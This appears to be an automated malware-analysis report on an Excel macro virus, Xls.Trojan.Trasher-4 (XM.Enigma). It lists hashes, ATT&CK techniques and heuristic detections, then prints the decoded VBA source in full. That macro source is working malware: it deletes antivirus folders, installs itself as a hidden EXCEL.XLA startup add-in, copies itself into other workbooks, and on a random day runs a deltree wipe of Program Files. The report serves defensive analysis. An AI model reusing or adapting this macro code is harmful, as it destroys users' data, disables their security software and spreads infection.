Xls.Trojan.Trasher-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 009b0ba665439911…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 20.0 KB
Created: 1998-02-12 17:58:36
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 63df2acd751c8a53dc28c76cb4af14d4
SHA-1: e8912e35b3463c27f830f7052bf11a38fc4877d6
SHA-256: 009b0ba665439911ab0a843b81d247abd7c7e1d455b60370805355e085587b01
Risk Score: 280

Malware Insights

Xls.Trojan.Trasher-4 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1027 Obfuscated Files or Information

The Auto_Open VBA macro executes when the document is opened. It attempts to delete the installation directories of several common antivirus products and then copies the workbook to the Excel startup path as 'EXCEL.XLA' to achieve persistence. The macro also uses obfuscation techniques and calls routines named 'Enigma' and 'CHG', indicating an intent to evade detection and maintain control.

Heuristics (5)

  • ClamAV: Xls.Trojan.Trasher-4 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Trojan.Trasher-4
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Auto_Open macro [high, OLE_VBA_AUTO]
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, in which the visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2682 bytes
SHA-256: 2e862e1cb278d2d561594800170ea4d9feca8f5446c31121b85d48b1d60a018b
Detection: ClamAV: Xls.Trojan.Trasher-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet3"

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\FindVirus\*.*"
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\f-macro\*.*"
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Norton AntiVirus\*.*"
Call Enigma
If CHG() Then
GoTo EBU:
Else
Call ING
End If
EBU:
Application.OnSheetActivate = "EXCEL.XLA!DIB"
End2:
End Sub

Function CHG() As Boolean
Attribute CHG.VB_ProcData.VB_Invoke_Func = " \n14"
CHG = False
For q = 1 To Application.Workbooks.Count
If Application.Workbooks(q).Name = "EXCEL.XLA" Then
For u = 1 To Application.Workbooks("EXCEL.XLA").Modules.Count
If Application.Workbooks("EXCEL.XLA").Modules(u).Name = "Sheet3" Then
CHG = True
End If
Next u
End If
Next q
End Function

Function ING()
Attribute ING.VB_ProcData.VB_Invoke_Func = " \n14"
ab = ActiveWorkbook.Name
Workbooks(ab).SaveCopyAs Application.StartupPath + "\EXCEL.XLA"
Workbooks.Open (Application.StartupPath + "\EXCEL.XLA")
Windows("EXCEL.XLA").Visible = False
Application.Workbooks("EXCEL.XLA").Save
End Function

Function ADI() As Boolean
Attribute ADI.VB_ProcData.VB_Invoke_Func = " \n14"
ac = ActiveWorkbook.Name
ADI = False
For y = 1 To Application.Workbooks(ac).Modules.Count
If Application.Workbooks(ac).Modules(y).Name = "Sheet3" Then
ADI = True
End If
Next y
End Function

Sub DIB()
Attribute DIB.VB_ProcData.VB_Invoke_Func = " \n14"
ad = ActiveWorkbook.Name
If ADI() Then
GoTo KI
End If
Application.ScreenUpdating = False
Application.Windows("EXCEL.XLA").Visible = True
Workbooks("EXCEL.XLA").Activate
Sheets("Sheet3").Visible = True
Workbooks("EXCEL.XLA").Sheets("Sheet3").Copy Before:=Workbooks(ad).Sheets(1)
Workbooks(ad).Sheets("Sheet3").Visible = False
Workbooks("EXCEL.XLA").Sheets("Sheet3").Visible = False
Windows("EXCEL.XLA").Visible = False
KI:
Close
End Sub

Sub Enigma()
Attribute Enigma.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If Day(Now()) = Int((31 * Rnd) + 1) Then
Shell ("Deltree  /y C:\Progra~1")
Do
MsgBox "Your computer is infected XM.Enigma virus by ULTRAS", 16, "ULTRAS"
Loop
End If
End Sub